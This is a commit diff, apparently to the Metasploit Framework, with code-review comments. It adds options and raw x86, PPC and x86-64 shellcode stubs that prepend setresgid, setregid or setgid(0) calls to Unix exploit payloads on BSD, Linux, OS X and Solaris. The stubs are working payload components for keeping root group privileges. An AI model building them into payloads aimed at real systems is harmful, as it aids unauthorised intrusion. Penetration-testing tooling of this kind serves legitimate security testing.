add PrependSet[re]gid support for unix payloads
m m committed Oct 10, 2012
1 parent 9a0a063 commit 90b948f
Showing 4 changed files with 232 additions and 2 deletions.
50 changes: 50 additions & 0 deletions lib/msf/core/payload/bsd.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
@@ -99,6 +120,35 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
# Append

if (datastore['AppendExit'])
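Review bot: The three `Msf::OptBool` declarations and the x86 stubs under `PrependSetresgid`, `PrependSetregid` and `PrependSetgid` added here are byte-for-byte the same as the ones this commit adds to osx.rb, and the option declarations are repeated again in linux.rb and solaris.rb, so a later correction to one copy is likely to miss the others. Moving the shared option definitions into one place that the four payload modules include would remove that drift risk; the stubs can stay per-platform, since the fact that the BSD and OS X bytes coincide on this page says nothing about whether they must. The `initialize` and `generate` methods both hunks extend start and end outside the section shown.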
104 changes: 102 additions & 2 deletions lib/msf/core/payload/linux.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('PrependChrootBreak',
[
false,
@@ -102,6 +123,31 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xaa" +# movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x47" +# pushl $0x47 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x2e" +# pushl $0x2e #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
@@ -185,6 +231,33 @@ def generate(*args)
"\x44\xff\xff\x02" # sc #
end

if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
end

if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
@@ -235,6 +308,33 @@ def generate(*args)
pre << "\x0f\x05" # syscall #
end

if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x6a\x77" # push 0x77 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x48\x89\xfe" # mov rsi,rdi #
pre << "\x48\x89\xf2" # mov rdx,rsi #
pre << "\x6a\x72" # push 0x72 #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x48\x31\xff" # xor rdi,rdi #
pre << "\x6a\x6a" # push 0x6a #
pre << "\x58" # pop rax #
pre << "\x0f\x05" # syscall #
end

if (datastore['PrependChrootBreak'])

# setreuid(0, 0)
@@ -269,7 +369,7 @@ def generate(*args)
pre << "\x48\x89\xe7" # mov rdi,rsp #

# loop chdir(..) 69 times
# syscall tendo to modify rcx can't use loop...
# syscall tend to modify rcx can't use loop...
pre << "\x6a\x45" # push 0x45 #
pre << "\x5b" # pop rbx #
pre << "\x6a\x50" # push 0x50 #
@@ -278,7 +378,7 @@ def generate(*args)
pre << "\xfe\xcb" # dec bl #
pre << "\x75\xf7" # jnz -7 #

# chrot (.) (witch should by /)
# chroot (.) (which should be /)
pre << "\x6a\x2e" # push . (0x2e) #
pre << "\x48\x89\xe7" # mov rdi,rsp #
pre << "\x48\x89\xd0" # mov rax,rdx #
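Review bot: In the x86 branch the new `PrependSetgid` block's `end` is immediately followed by `if (datastore['PrependChrootBreak'])` with no separating blank line, unlike every other stub block in this file, including the PPC and x86-64 copies of the same three blocks added further down; add one blank line after that `end` so the block boundaries read the same everywhere. The `generate` method the hunks extend starts and ends outside the section shown, so the architecture guards that select each branch are not visible here.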
50 changes: 50 additions & 0 deletions lib/msf/core/payload/osx.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
"false"
]
),
Msf::OptBool.new('PrependSetresgid',
[
false,
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
@@ -99,6 +120,35 @@ def generate(*args)
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
# Append

if (datastore['AppendExit'])
30 changes: 30 additions & 0 deletions lib/msf/core/payload/solaris.rb
@@ -33,6 +33,20 @@ def initialize(info = {})
"false"
]
),
Msf::OptBool.new('PrependSetregid',
[
false,
"Prepend a stub that executes the setregid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetgid',
[
false,
"Prepend a stub that executes the setgid(0) system call",
"false"
]
),
Msf::OptBool.new('AppendExit',
[
false,
@@ -86,6 +100,22 @@ def generate(*args)
"\xff\xd6" # call *%esi #
end

if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xcb" +# movb $0xcb,%al #
"\xff\xd6" # call *%esi #
end

if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x2e" +# movb $0x2e,%al #
"\xff\xd6" # call *%esi #
end
# Append

if (datastore['AppendExit'])
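Review bot: This file gains only `PrependSetregid` and `PrependSetgid`, while bsd.rb, linux.rb and osx.rb in the same commit also gain `PrependSetresgid`, and nothing in either hunk records why the third option is omitted here, so a maintainer aiming for parity is likely to add it later. A one-line comment above the `PrependSetregid` declaration, e.g. `# No PrependSetresgid option: this module provides no setresgid stub`, would preserve the intent; whether the underlying call exists on the target is not something this page shows, so the comment should not claim it. The `initialize` and `generate` methods both start and end outside the section shown.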
